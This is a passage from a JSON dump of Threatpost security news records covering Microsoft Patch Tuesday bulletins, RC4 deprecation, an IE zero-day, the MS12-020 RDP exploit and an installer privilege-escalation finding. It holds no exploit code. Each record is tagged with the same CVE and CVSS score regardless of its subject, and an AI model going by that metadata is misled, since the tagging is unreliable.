The previous record was 34 vulnerabilities patched in August this year.\n\nThe October patch batch will include fixes for security flaws in the Windows operating system, the Internet Explorer browser, Microsoft Office and the .NET Framework.\n\nIt is very likely that Microsoft will include patches for a pair of elevation of privilege vulnerabilities that were exploited during the mysterious Stuxnet worm attack.\n\nThe flaws in this month\u2019s release affect all versions of Windows, including the newest Windows 7 and Windows Server 2008.\n", "cvss3": {}, "published": "2010-10-07T18:43:29", "type": "threatpost", "title": "Microsoft Plans Record-Breaking Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:21:27", "id": "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "href": "https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/74560/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:10", "description": "Microsoft\u2019s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed. The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 encryption algorithm.\n\nFollowing its initial advisory in May that applied to the .NET framework, today\u2019s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.\n\nThe advisory also updates the default transport encryption in Windows to TLS 1.2.\n\nThe move is timely as the industry continues to move away from weakened encryption. 
For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put weak encryption within reach of well-funded criminal or state-sponsored operations.\n\nAs for today\u2019s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and JScript engines in Windows.\n\nFour vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it is also not aware of public exploits.\n\nMicrosoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.\n\nThe vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2. Today\u2019s update patches two separate scripting engine memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.\n\n\u201cThe update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,\u201d Microsoft said in its advisory.\n\n\u201cWith the number of JScript and VBscript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,\u201d said Core Security systems engineer Bobby Kuzma. 
\u201cUnfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.\u201d\n\nMicrosoft also patched 14 vulnerabilities in Internet Explorer and two more in Microsoft Edge browser for Windows 10 systems.\n\nMost of the IE update addresses memory corruption vulnerabilities in [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>) along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and Jscript bulletin, since IE is the principal attack vector there. One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.\n\nThe Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser\u2019s cross-site scripting filter, and a separate information disclosure vulnerability.\n\nThe remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.\n\n\u201cThe vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,\u201d Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).\n\nThe remaining bulletins are rated important by Microsoft.\n\n[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.\n", "cvss3": {}, "published": 
"2015-10-13T14:39:57", "type": "threatpost", "title": "October 2015 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-14T20:03:27", "id": "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "href": "https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:30", "description": "As the inquiry into who [leaked the proof-of-concept exploit code for the MS12-020 RDP flaw](<https://threatpost.com/exploit-ms12-020-rdp-bug-moves-metasploit-032012/>) continues, organizations that have not patched their machines yet have a new motivation to do so: A Metasploit module for the vulnerability is now available. \n\nIt\u2019s been a week now since Microsoft released a patch for the RDP bug and the exploit code that was included with the information the company sent to its partners in MAPP (Microsoft Active Protections Program) was found in an exploit on a Chinese download site shortly thereafter. Luigi Auriemma, the researcher who discovered and reported the vulnerability to Microsoft through the TippingPoint Zero Day Initiative, said that the packet found in the exploit code that leaked was a direct copy of the one he submitted with his bug report. \n\nOfficials at ZDI said that they are certain that the code did not leak from their organization. Microsoft officials have said little more than to acknowledge that there seems to be a leak from somewhere within MAPP. The company has not indicated whether that was on their end or from one of the MAPP members. \n\nNow, there is a working exploit committed to the [Metasploit Framework](<http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids>), which is a typically a good indicator that attacks are about to ramp up. 
Brad Arkin, head of product security and privacy at Adobe, said in a talk recently that when there\u2019s a newly public vulnerability in one of the company\u2019s products, the attacks start with a trickle against high value targets and then increase sharply from there.\n\n\u201cThe biggest jump in exploits we see is right after the release of a Metasploit module,\u201d he said. \u201cWe\u2019ll see a few attacks a day before that and then it will spike to five thousand a day, and it goes up from there. There\u2019s a correlation between the broader availability of an exploit and more people getting attacked.\u201d\n\nThe exploit in Metasploit, like the one that has been circulating online, causes a denial-of-service condition on vulnerable machines. Researchers have been working on developing a working remote code execution exploit for the bug, as well, but none has surfaced publicly yet.\n", "cvss3": {}, "published": "2012-03-20T18:08:49", "type": "threatpost", "title": "Exploit For Ms12-020 RDP Bug Moves to Metasploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:35", "id": "THREATPOST:E067CFBFA163616683563A8ED34648FE", "href": "https://threatpost.com/exploit-ms12-020-rdp-bug-moves-metasploit-032012/76346/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "[](<https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/>)There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. 
[CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\n> A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the \u201cgetElementsByTagName()\u201d method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. 
In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "[](<https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/>)\n\nDennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": 
"THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n \nLaw enforcement agents with less than 10 minutes training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off for moving. \n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. 
This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. 
Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nThe bug affects Microsoft Word 2007; users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. 
\u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month brings 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to seeing around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its share of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Services; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. 
If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. 
The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:\\Users\\username\\AppData\\Local\\Temp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp` (where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. 
The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. 
I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET do the same, through modifying the system registry. 
While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. 
The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was as part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). 
The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft and nearly any other company on the planet, knows how to build products for mid-tier businesses. 
In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long-term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:06", "description": "**[](<https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/>)UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. A wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they\u2019re releasing the patch now because they\u2019re expecting exploit code to be released in the near future.\n\nThe vulnerability was discussed at the Chaos Communications Congress conference in Germany earlier this week, although some form of the problem has been known for several years. 
In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.\n\nMicrosoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Susha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\n\u201cThe root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.\u201d\n\nIn its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. 
The workaround decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible to the attack.\n\n\u201cThis configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,\u201d the advisory says.\n\nThe security researchers who published details of the vulnerability, Alexander Klink and Julian Walde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>). \n", "cvss3": {}, "published": "2011-12-29T15:31:23", "type": "threatpost", "title": "Microsoft to Release Emergency Fix for ASP.NET DoS Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:05", "id": "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "href": "https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "MIAMI BEACH\u2013It\u2019s been a decade now since Microsoft began focusing on product security as a top priority and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it\u2019s become for attackers to compromise Windows machines. That\u2019s not to say, however, that the fight has been won. 
It\u2019s only beginning, in fact, a senior Microsoft security official said.\n\nThere are a lot of bits and pieces that comprise [Microsoft\u2019s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company\u2019s products. But the one thing that all of these initiatives have in common is that they\u2019re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products. Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.\n\n\u201cFor stealthy, reliable exploits, you need a lot of R&D and they\u2019re shorter-lived now. It\u2019s getting harder to find bugs and exploits,\u201d Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. \u201cThe defender\u2019s ethos is to increase attacker investment. Copy what works and keep plugging away. We\u2019re in this for the long haul.\u201d\n\nAlthough the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company\u2019s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and included some other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its systems.\n\n\u201cPre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,\u201d he said. \u201cThose were the days. It was then that the executives said, we\u2019re going to take the steps that are necessary to fix this.\u201d\n\nThose changes were not limited to Windows products, though. 
